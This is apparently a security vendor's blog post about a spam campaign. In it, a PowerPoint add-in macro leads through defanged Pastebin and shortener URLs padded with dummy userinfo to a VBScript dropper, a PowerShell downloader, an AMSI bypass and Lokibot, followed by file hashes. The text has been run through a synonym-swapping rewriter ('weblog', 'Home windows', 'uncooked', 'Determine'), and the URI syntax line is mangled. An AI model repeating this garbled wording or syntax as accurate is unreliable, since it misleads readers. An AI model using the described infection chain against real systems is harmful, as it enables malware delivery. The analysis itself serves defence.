In Spam, Evasive URLs: Part 2

In Spam, Evasive URLs: Part 2


A URL might be utterly legitimate, but nonetheless deceptive. On this weblog, we’ll current one other approach with URLs that we noticed in a latest malicious spam marketing campaign. That is the continuation of an earlier weblog that mentioned how legitimate URL codecs can be utilized in evading detection.

The spams on this marketing campaign have a PowerPoint Add-in attachment which accommodates a malicious macro. When the PowerPoint file is closed, it accesses a URL by way of the Home windows binary mshta.exe, and this results in totally different malware being put in into the system. This routine just isn’t uncommon for macro downloaders. Nonetheless, we discover the obfuscation used on the URL fascinating and worthy of additional investigation.

In Spam, Evasive URLs: Part 2

Determine 1: The spam containing a PowerPoint Add-in and the PowerPoint’s course of tree

In Spam, Evasive URLs: Part 2

Determine 2: The PowerPoint attachment and its macro code the place the preliminary malicious URL is formulated

The domains related to this marketing campaign are already identified to host malicious recordsdata and obfuscated malicious information. To trick the e-mail recipient, and keep away from being flagged by electronic mail and AV scanners, the cybercriminals behind this marketing campaign employed a semantic assault on these URLs.

A URI could have an Authority part and beneath is its construction. If the Userinfo subcomponent is current, it’s preceded by two slashes and adopted by an “@” character.

authority = [[email protected]]host[:port]

Userinfo isn’t used, and as such, can be utilized to try to idiot an off-the-cuff observer. On this marketing campaign, dummy userinfo is included on the URLs. The unhealthy guys are trying to make the domains unnoticeable but nonetheless conforming with the generic URI syntax.

In Spam, Evasive URLs: Part 2

Determine 3: The URL move

The preliminary URL proven within the picture above has the area j[.]mp – a URL shortening service supplied by, a URL shortener too. To keep away from being characterised as a brief URL and finally evading detection signatures, the string “%909123id” is repeatedly used within the userinfo. For the reason that URL j[.]mp/kassaasdskdd (shortened from Determine 3) doesn’t require a userinfo to realize entry to any assets, the userinfo information can be ignored when the URL is accessed. The primary URL, accessed by the PowerPoint attachment, redirects to an obfuscated VBScript hosted on Pastebin.

In Spam, Evasive URLs: Part 2

Determine 4: The obfuscated script on Pastebin and its de-obfuscated information

In Spam, Evasive URLs: Part 2

Determine 5: The registry entry created by the VBScript on Determine 4

The VBScript, contained within the 2nd URL in Determine 3, is a dropper. It writes a PowerShell downloader into the registry and units its persistence. The PowerShell downloads and processes the uncooked information on two extra Pastebin URLs, after which executes the output binaries.

The third and the fourth URLs are Pastebin URLs too. Each comprise dummy userinfo as effectively which can be ignored by the Pastebin URLs. The content material on the third URL pastebin[.]com/uncooked/uhMtv3Bk (shortened from Determine 3) accommodates an obfuscated PowerShell code. The PowerShell executes 2 DotNet compiled DLLs – the primary DLL bypasses the Anti-Malware Scan Interface (AMSI) after which masses a DLL injector into the reminiscence. The fourth URL pastebin[.]com/uncooked/Nz1mPUdT (shortened from Determine 3) accommodates an obfuscated malware Lokibot pattern. This can be injected to a legit course of notedpad.exe by the DLL injector talked about earlier.


We discovered it fascinating that the attackers had been utilizing URIs on this method, which basically is an assault on the person’s preconceived notion of what a URI ought to appear like. It could additionally defeat safety options, which can expect URIs in a sure format.

Trustwave Safe E-mail Gateway has added safety for this risk for our prospects. As suggested by my colleague within the weblog, be cautious with URLs obtained from exterior emails – examine hyperlinks earlier than clicking.


E-mail Attachment
REQUEST FOR OFFER 08-20-2020.ppt (82944 bytes) SHA1: 01A3399F8A075137CD4F68A2B247C509FCEAB21F

DLL Injectors
WindowsFormsApplication68.dll (49664 bytes) F8E91A3A407235583058DF06C2C2CCDE73194A03
Guwav.dll (20480 bytes) SHA1: 70b45d01eea4156610583c8b3dfcab89eeb6f113

Obfuscated VBScipt from pastebin[.]com/uncooked/XZxTT7Xy
(3346 bytes) SHA1: FC050B623983B10D60ED4557771609C9D10F3C3A
Obfuscated PowerShell from pastebin[.]com/uncooked/uhMtv3Bk
(525125 bytes) SHA1: 047D7516EF672AE882B322F1E3E9DF2BDF7F4583
Lokibot deobfuscated from pastebin[.]com/uncooked/Nz1mPUdT
(104.0KB) SHA1: A988B692581A76A6220A641037F7AA254C1F293F
Lokibot Setting URL
Lokibot C&Cs

trustwave zoominfo,trustwave asia,trustwave clients,trustwave accounts payable,trustwave government solutions,trustwave logo